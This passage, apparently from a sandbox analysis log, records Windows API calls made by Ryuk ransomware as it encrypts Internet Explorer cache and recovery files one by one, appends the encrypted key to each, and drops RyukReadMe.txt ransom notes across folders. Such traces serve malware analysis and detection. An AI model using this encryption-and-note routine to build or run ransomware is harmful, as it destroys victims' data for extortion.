pdwDataLen=0x29ab118*=0x8000, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x8010) returned 1 [0141.825] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.825] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x8010, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x8010, lpOverlapped=0x0) returned 1 [0141.825] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0141.826] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0141.826] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0141.826] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0141.826] CloseHandle (hObject=0x198) returned 1 [0141.843] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.847] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.847] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.847] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.847] SetLastError (dwErrCode=0x0) [0141.847] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.847] GetLastError () returned 0xb7 [0141.847] CloseHandle (hObject=0x198) returned 1 [0141.847] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0141.847] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0141.847] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0141.848] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0141.848] SetLastError (dwErrCode=0x0) [0141.848] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\owlvmzrc\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.848] GetLastError () returned 0x0 [0141.848] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0141.849] CloseHandle (hObject=0x198) returned 1 [0141.849] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0141.849] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0141.849] SetLastError (dwErrCode=0x0) [0141.849] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.849] GetLastError () returned 0xb7 [0141.849] CloseHandle (hObject=0x194) returned 1 [0141.849] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.849] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.850] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat", dwFileAttributes=0x80) returned 1 [0141.851] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\frameiconcache.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.851] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=9204) returned 1 [0141.851] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=9204) returned 1 [0141.851] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x22d2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.851] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0141.852] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.852] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0141.852] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.852] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.852] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x23f4, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x23f4, lpOverlapped=0x0) returned 1 [0141.853] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0141.853] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x23f4, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x2400) returned 1 [0141.853] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.853] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x2400, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x2400, lpOverlapped=0x0) returned 1 [0141.853] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0141.853] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0141.853] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0141.853] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0141.853] CloseHandle (hObject=0x194) returned 1 [0141.871] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.877] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.877] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.877] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.877] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.877] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT", dwFileAttributes=0x80) returned 1 [0141.878] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\MSIMGSIZ.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\msimgsiz.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.878] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=16384) returned 1 [0141.879] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=16384) returned 1 [0141.879] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x3ede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.879] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0141.880] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.880] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0141.880] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.880] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.880] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x4000, lpOverlapped=0x0) returned 1 [0141.881] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0141.881] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x4000, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x4010) returned 1 [0141.881] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.881] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x4010, lpOverlapped=0x0) returned 1 [0141.882] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0141.882] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0141.882] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0141.882] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0141.882] CloseHandle (hObject=0x194) returned 1 [0141.908] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.912] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.913] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.913] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.913] SetLastError (dwErrCode=0x0) [0141.913] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.913] GetLastError () returned 0xb7 [0141.913] CloseHandle (hObject=0x194) returned 1 [0141.913] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0141.913] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.913] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.913] SetLastError (dwErrCode=0x0) [0141.913] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.914] GetLastError () returned 0x0 [0141.914] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0141.915] CloseHandle (hObject=0x198) returned 1 [0141.915] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0141.915] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0141.915] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0141.915] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0141.915] SetLastError (dwErrCode=0x0) [0141.915] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\active\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.916] GetLastError () returned 0x0 [0141.916] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0141.916] CloseHandle (hObject=0x198) returned 1 [0141.917] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.917] SetLastError (dwErrCode=0x0) [0141.917] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.917] GetLastError () returned 0xb7 [0141.917] CloseHandle (hObject=0x198) returned 1 [0141.917] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0141.919] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0141.919] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0141.919] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.919] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat", dwFileAttributes=0x80) returned 1 [0141.919] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{4BD650F1-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{4bd650f1-c8f9-11e7-b5bf-c43dc7584a00}.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0141.919] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=3584) returned 1 [0141.920] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=3584) returned 1 [0141.920] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0xcde, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.920] ReadFile (in: hFile=0x19c, lpBuffer=0x29aa9d8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa998, lpOverlapped=0x0 | out: lpBuffer=0x29aa9d8*, lpNumberOfBytesRead=0x29aa998*=0x19, lpOverlapped=0x0) returned 1 [0141.921] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.921] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa960 | out: phKey=0x29aa960*=0x3b8690) returned 1 [0141.921] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.921] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.921] ReadFile (in: hFile=0x19c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa970*=0xe00, lpOverlapped=0x0) returned 1 [0141.921] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4250) returned 1 [0141.921] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa968*=0xe00, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa968*=0xe10) returned 1 [0141.921] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.921] WriteFile (in: hFile=0x19c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa970*=0xe10, lpOverlapped=0x0) returned 1 [0141.921] WriteFile (in: hFile=0x19c, lpBuffer=0x29aa9b0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aa9b0*, lpNumberOfBytesWritten=0x29aa974*=0x6, lpOverlapped=0x0) returned 1 [0141.921] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa980 | out: pbData=0x0*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0141.921] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aaa00, pdwDataLen=0x29aa980 | out: pbData=0x29aaa00*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0141.921] WriteFile (in: hFile=0x19c, lpBuffer=0x29aaa00*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aaa00*, lpNumberOfBytesWritten=0x29aa974*=0x10c, lpOverlapped=0x0) returned 1 [0141.922] CloseHandle (hObject=0x19c) returned 1 [0141.938] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.942] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.942] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.942] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0141.943] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.943] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat", dwFileAttributes=0x80) returned 1 [0141.943] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{aae6bf5c-4991-11e7-8e2b-c43dc7584a00}.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0141.943] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=4608) returned 1 [0141.943] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=4608) returned 1 [0141.944] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x10de, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.944] ReadFile (in: hFile=0x19c, lpBuffer=0x29aa9d8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa998, lpOverlapped=0x0 | out: lpBuffer=0x29aa9d8*, lpNumberOfBytesRead=0x29aa998*=0x19, lpOverlapped=0x0) returned 1 [0141.945] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.945] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa960 | out: phKey=0x29aa960*=0x3b8690) returned 1 [0141.945] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.945] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.945] ReadFile (in: hFile=0x19c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa970*=0x1200, lpOverlapped=0x0) returned 1 [0141.946] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4250) returned 1 [0141.946] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa968*=0x1200, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa968*=0x1210) returned 1 [0141.946] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.946] WriteFile (in: hFile=0x19c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0x29aa970, lpOverlapped=0x0 | 